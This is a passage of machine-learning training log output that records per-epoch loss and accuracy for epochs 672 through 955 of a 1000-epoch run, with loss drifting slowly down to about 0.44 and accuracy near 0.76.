5ms/step - loss: 0.5193 - accuracy: 0.7800\nEpoch 673/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5140 - accuracy: 0.7600\nEpoch 674/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5200 - accuracy: 0.7800\nEpoch 675/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5069 - accuracy: 0.7800\nEpoch 676/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5016 - accuracy: 0.7200\nEpoch 677/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5108 - accuracy: 0.7600\nEpoch 678/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5217 - accuracy: 0.7600\nEpoch 679/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5218 - accuracy: 0.7200\nEpoch 680/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5080 - accuracy: 0.7400\nEpoch 681/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5088 - accuracy: 0.7400\nEpoch 682/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5151 - accuracy: 0.8000\nEpoch 683/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5020 - accuracy: 0.7800\nEpoch 684/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5539 - accuracy: 0.7200\nEpoch 685/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5223 - accuracy: 0.7600\nEpoch 686/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5530 - accuracy: 0.7200\nEpoch 687/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5172 - accuracy: 0.7800\nEpoch 688/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4951 - accuracy: 0.7800\nEpoch 689/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4923 - accuracy: 0.7800\nEpoch 690/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5045 - accuracy: 0.7600\nEpoch 691/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5027 - accuracy: 0.7800\nEpoch 692/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4986 - accuracy: 0.7600\nEpoch 693/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4972 - accuracy: 0.7800\nEpoch 694/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5020 - accuracy: 0.7400\nEpoch 695/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5067 - accuracy: 0.7400\nEpoch 696/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5130 - accuracy: 0.7800\nEpoch 697/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5025 - accuracy: 0.7600\nEpoch 698/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4934 - accuracy: 0.7400\nEpoch 699/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5007 - accuracy: 0.7800\nEpoch 700/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4890 - accuracy: 0.7600\nEpoch 701/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4891 - accuracy: 0.7600\nEpoch 702/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4937 - accuracy: 0.7400\nEpoch 703/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4934 - accuracy: 0.7800\nEpoch 704/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5068 - accuracy: 0.7200\nEpoch 705/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4851 - accuracy: 0.7600\nEpoch 706/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4938 - accuracy: 0.8000\nEpoch 707/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4889 - accuracy: 0.7400\nEpoch 708/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5064 - accuracy: 0.7600\nEpoch 709/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5188 - accuracy: 0.7600\nEpoch 710/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5089 - accuracy: 0.7800\nEpoch 711/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4891 - accuracy: 0.8000\nEpoch 712/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4878 - accuracy: 0.7800\nEpoch 713/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4889 - accuracy: 0.7800\nEpoch 714/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4879 - accuracy: 0.7400\nEpoch 715/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4986 - accuracy: 0.7000\nEpoch 716/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4864 - accuracy: 0.7800\nEpoch 717/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4856 - accuracy: 0.7600\nEpoch 718/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5066 - accuracy: 0.8000\nEpoch 719/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4886 - accuracy: 0.7600\nEpoch 720/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5073 - accuracy: 0.7400\nEpoch 721/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5182 - accuracy: 0.7400\nEpoch 722/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5489 - accuracy: 0.7000\nEpoch 723/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5300 - accuracy: 0.8000\nEpoch 724/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5234 - accuracy: 0.7200\nEpoch 725/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4916 - accuracy: 0.7600\nEpoch 726/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4887 - accuracy: 0.7400\nEpoch 727/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5122 - accuracy: 0.7200\nEpoch 728/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5393 - accuracy: 0.7400\nEpoch 729/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5145 - accuracy: 0.7800\nEpoch 730/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5277 - accuracy: 0.8000\nEpoch 731/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5106 - accuracy: 0.7200\nEpoch 732/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5692 - accuracy: 0.7800\nEpoch 733/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5591 - accuracy: 0.7000\nEpoch 734/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5141 - accuracy: 0.7200\nEpoch 735/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5099 - accuracy: 0.7600\nEpoch 736/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4936 - accuracy: 0.7600\nEpoch 737/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4916 - accuracy: 0.8200\nEpoch 738/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5034 - accuracy: 0.7200\nEpoch 739/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5160 - accuracy: 0.7600\nEpoch 740/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4962 - accuracy: 0.8000\nEpoch 741/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4857 - accuracy: 0.7800\nEpoch 742/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5080 - accuracy: 0.7600\nEpoch 743/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4716 - accuracy: 0.8000\nEpoch 744/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4865 - accuracy: 0.7800\nEpoch 745/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5023 - accuracy: 0.7400\nEpoch 746/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5040 - accuracy: 0.7400\nEpoch 747/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4985 - accuracy: 0.7200\nEpoch 748/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4766 - accuracy: 0.7400\nEpoch 749/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4910 - accuracy: 0.7600\nEpoch 750/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4965 - accuracy: 0.7800\nEpoch 751/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4886 - accuracy: 0.7600\nEpoch 752/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4814 - accuracy: 0.7200\nEpoch 753/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4800 - accuracy: 0.7800\nEpoch 754/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4785 - accuracy: 0.7600\nEpoch 755/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4750 - accuracy: 0.7200\nEpoch 756/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4866 - accuracy: 0.7600\nEpoch 757/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5044 - accuracy: 0.7400\nEpoch 758/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4994 - accuracy: 0.7800\nEpoch 759/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5016 - accuracy: 0.7600\nEpoch 760/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4797 - accuracy: 0.7400\nEpoch 761/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4993 - accuracy: 0.7800\nEpoch 762/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4822 - accuracy: 0.7600\nEpoch 763/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4799 - accuracy: 0.7800\nEpoch 764/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4743 - accuracy: 0.8000\nEpoch 765/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4921 - accuracy: 0.7600\nEpoch 766/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4858 - accuracy: 0.7400\nEpoch 767/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4759 - accuracy: 0.7200\nEpoch 768/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4936 - accuracy: 0.7600\nEpoch 769/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4708 - accuracy: 0.7800\nEpoch 770/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5029 - accuracy: 0.7600\nEpoch 771/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5095 - accuracy: 0.7400\nEpoch 772/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4761 - accuracy: 0.7800\nEpoch 773/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4837 - accuracy: 0.7400\nEpoch 774/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4733 - accuracy: 0.7600\nEpoch 775/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4933 - accuracy: 0.7600\nEpoch 776/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4700 - accuracy: 0.7600\nEpoch 777/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4668 - accuracy: 0.7800\nEpoch 778/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4800 - accuracy: 0.8000\nEpoch 779/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4739 - accuracy: 0.8000\nEpoch 780/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4999 - accuracy: 0.7800\nEpoch 781/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4942 - accuracy: 0.7400\nEpoch 782/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4827 - accuracy: 0.7400\nEpoch 783/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4731 - accuracy: 0.7200\nEpoch 784/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4966 - accuracy: 0.7800\nEpoch 785/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4872 - accuracy: 0.7600\nEpoch 786/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4763 - accuracy: 0.7800\nEpoch 787/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4788 - accuracy: 0.7800\nEpoch 788/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4792 - accuracy: 0.7800\nEpoch 789/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4746 - accuracy: 0.7800\nEpoch 790/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4713 - accuracy: 0.7600\nEpoch 791/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4749 - accuracy: 0.7800\nEpoch 792/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4626 - accuracy: 0.7800\nEpoch 793/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4640 - accuracy: 0.7800\nEpoch 794/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4705 - accuracy: 0.7600\nEpoch 795/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4642 - accuracy: 0.7800\nEpoch 796/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4832 - accuracy: 0.7400\nEpoch 797/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4715 - accuracy: 0.7800\nEpoch 798/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4843 - accuracy: 0.7800\nEpoch 799/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4622 - accuracy: 0.7800\nEpoch 800/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4632 - accuracy: 0.8000\nEpoch 801/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4812 - accuracy: 0.7600\nEpoch 802/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4766 - accuracy: 0.7400\nEpoch 803/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4807 - accuracy: 0.7800\nEpoch 804/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5044 - accuracy: 0.7400\nEpoch 805/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4801 - accuracy: 0.7400\nEpoch 806/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4680 - accuracy: 0.8000\nEpoch 807/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4706 - accuracy: 0.7200\nEpoch 808/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4596 - accuracy: 0.7800\nEpoch 809/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4716 - accuracy: 0.7400\nEpoch 810/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4778 - accuracy: 0.7800\nEpoch 811/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4745 - accuracy: 0.7600\nEpoch 812/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4774 - accuracy: 0.7600\nEpoch 813/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4540 - accuracy: 0.8000\nEpoch 814/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4738 - accuracy: 0.7600\nEpoch 815/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4764 - accuracy: 0.7600\nEpoch 816/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4734 - accuracy: 0.7400\nEpoch 817/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4756 - accuracy: 0.7600\nEpoch 818/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4627 - accuracy: 0.7400\nEpoch 819/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4675 - accuracy: 0.7800\nEpoch 820/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4681 - accuracy: 0.7800\nEpoch 821/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4673 - accuracy: 0.7600\nEpoch 822/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4719 - accuracy: 0.7800\nEpoch 823/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4637 - accuracy: 0.7400\nEpoch 824/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4771 - accuracy: 0.7400\nEpoch 825/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4685 - accuracy: 0.7800\nEpoch 826/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4804 - accuracy: 0.7400\nEpoch 827/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4792 - accuracy: 0.7800\nEpoch 828/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7600\nEpoch 829/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4677 - accuracy: 0.7600\nEpoch 830/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5080 - accuracy: 0.7400\nEpoch 831/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5002 - accuracy: 0.7200\nEpoch 832/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4694 - accuracy: 0.7600\nEpoch 833/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4601 - accuracy: 0.7400\nEpoch 834/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4690 - accuracy: 0.7200\nEpoch 835/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4564 - accuracy: 0.7600\nEpoch 836/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4669 - accuracy: 0.7400\nEpoch 837/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4596 - accuracy: 0.8000\nEpoch 838/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4725 - accuracy: 0.7200\nEpoch 839/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4692 - accuracy: 0.7600\nEpoch 840/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4595 - accuracy: 0.8000\nEpoch 841/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4616 - accuracy: 0.7800\nEpoch 842/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4689 - accuracy: 0.7400\nEpoch 843/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4659 - accuracy: 0.7600\nEpoch 844/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4675 - accuracy: 0.7200\nEpoch 845/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4739 - accuracy: 0.7800\nEpoch 846/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4653 - accuracy: 0.8000\nEpoch 847/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4541 - accuracy: 0.7600\nEpoch 848/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4773 - accuracy: 0.7400\nEpoch 849/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4595 - accuracy: 0.8200\nEpoch 850/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4671 - accuracy: 0.7400\nEpoch 851/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4474 - accuracy: 0.7600\nEpoch 852/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4583 - accuracy: 0.7800\nEpoch 853/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4530 - accuracy: 0.7400\nEpoch 854/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4589 - accuracy: 0.7800\nEpoch 855/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4688 - accuracy: 0.7600\nEpoch 856/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4808 - accuracy: 0.7400\nEpoch 857/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4800 - accuracy: 0.7800\nEpoch 858/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4711 - accuracy: 0.7800\nEpoch 859/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7400\nEpoch 860/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4728 - accuracy: 0.7200\nEpoch 861/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4768 - accuracy: 0.7400\nEpoch 862/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4641 - accuracy: 0.8000\nEpoch 863/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5019 - accuracy: 0.7600\nEpoch 864/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4894 - accuracy: 0.7800\nEpoch 865/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4756 - accuracy: 0.8200\nEpoch 866/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4602 - accuracy: 0.7600\nEpoch 867/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4567 - accuracy: 0.7600\nEpoch 868/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4572 - accuracy: 0.7600\nEpoch 869/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4621 - accuracy: 0.8000\nEpoch 870/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4578 - accuracy: 0.7600\nEpoch 871/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7400\nEpoch 872/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4499 - accuracy: 0.7800\nEpoch 873/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4507 - accuracy: 0.7800\nEpoch 874/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4592 - accuracy: 0.7600\nEpoch 875/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4648 - accuracy: 0.8000\nEpoch 876/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4695 - accuracy: 0.7400\nEpoch 877/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5178 - accuracy: 0.7600\nEpoch 878/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5050 - accuracy: 0.7200\nEpoch 879/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4794 - accuracy: 0.7600\nEpoch 880/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4726 - accuracy: 0.8000\nEpoch 881/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4774 - accuracy: 0.7800\nEpoch 882/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4562 - accuracy: 0.7800\nEpoch 883/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4567 - accuracy: 0.7800\nEpoch 884/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4391 - accuracy: 0.7600\nEpoch 885/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4678 - accuracy: 0.7800\nEpoch 886/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4679 - accuracy: 0.7400\nEpoch 887/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4519 - accuracy: 0.7800\nEpoch 888/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4478 - accuracy: 0.7800\nEpoch 889/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4607 - accuracy: 0.7000\nEpoch 890/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4485 - accuracy: 0.7600\nEpoch 891/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4547 - accuracy: 0.7400\nEpoch 892/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4472 - accuracy: 0.7400\nEpoch 893/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4680 - accuracy: 0.7600\nEpoch 894/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4552 - accuracy: 0.7600\nEpoch 895/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4493 - accuracy: 0.7800\nEpoch 896/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4587 - accuracy: 0.7400\nEpoch 897/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4812 - accuracy: 0.8000\nEpoch 898/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4679 - accuracy: 0.8000\nEpoch 899/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5023 - accuracy: 0.7200\nEpoch 900/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4484 - accuracy: 0.7800\nEpoch 901/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4642 - accuracy: 0.7000\nEpoch 902/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4488 - accuracy: 0.7800\nEpoch 903/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4536 - accuracy: 0.7400\nEpoch 904/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4574 - accuracy: 0.7600\nEpoch 905/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4738 - accuracy: 0.7600\nEpoch 906/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4710 - accuracy: 0.7800\nEpoch 907/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4526 - accuracy: 0.8000\nEpoch 908/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4406 - accuracy: 0.7800\nEpoch 909/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4700 - accuracy: 0.7400\nEpoch 910/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4764 - accuracy: 0.7800\nEpoch 911/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4510 - accuracy: 0.7400\nEpoch 912/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4582 - accuracy: 0.7400\nEpoch 913/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4502 - accuracy: 0.7600\nEpoch 914/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4436 - accuracy: 0.7800\nEpoch 915/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4531 - accuracy: 0.7400\nEpoch 916/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4872 - accuracy: 0.8000\nEpoch 917/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5109 - accuracy: 0.7000\nEpoch 918/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5050 - accuracy: 0.7400\nEpoch 919/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4858 - accuracy: 0.7400\nEpoch 920/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5437 - accuracy: 0.7000\nEpoch 921/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4848 - accuracy: 0.7400\nEpoch 922/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4535 - accuracy: 0.7800\nEpoch 923/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4512 - accuracy: 0.7600\nEpoch 924/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4620 - accuracy: 0.7400\nEpoch 925/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4567 - accuracy: 0.7800\nEpoch 926/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4543 - accuracy: 0.8000\nEpoch 927/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4434 - accuracy: 0.7600\nEpoch 928/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4484 - accuracy: 0.7600\nEpoch 929/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4611 - accuracy: 0.7800\nEpoch 930/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4379 - accuracy: 0.7600\nEpoch 931/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4567 - accuracy: 0.8000\nEpoch 932/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4553 - accuracy: 0.7800\nEpoch 933/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4540 - accuracy: 0.7600\nEpoch 934/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4600 - accuracy: 0.7800\nEpoch 935/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4663 - accuracy: 0.7800\nEpoch 936/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4429 - accuracy: 0.8200\nEpoch 937/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4442 - accuracy: 0.8000\nEpoch 938/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4577 - accuracy: 0.7800\nEpoch 939/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4901 - accuracy: 0.7600\nEpoch 940/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4609 - accuracy: 0.8200\nEpoch 941/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4677 - accuracy: 0.8000\nEpoch 942/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4428 - accuracy: 0.7600\nEpoch 943/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4495 - accuracy: 0.7800\nEpoch 944/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4422 - accuracy: 0.8000\nEpoch 945/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4344 - accuracy: 0.8200\nEpoch 946/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4403 - accuracy: 0.7600\nEpoch 947/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4391 - accuracy: 0.7400\nEpoch 948/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4467 - accuracy: 0.7800\nEpoch 949/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4359 - accuracy: 0.8200\nEpoch 950/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4433 - accuracy: 0.7400\nEpoch 951/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4379 - accuracy: 0.7400\nEpoch 952/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4413 - accuracy: 0.7800\nEpoch 953/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4399 - accuracy: 0.7600\nEpoch 954/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4420 - accuracy: 0.7800\nEpoch 955/1000\n10/10 [==============================] - 0s 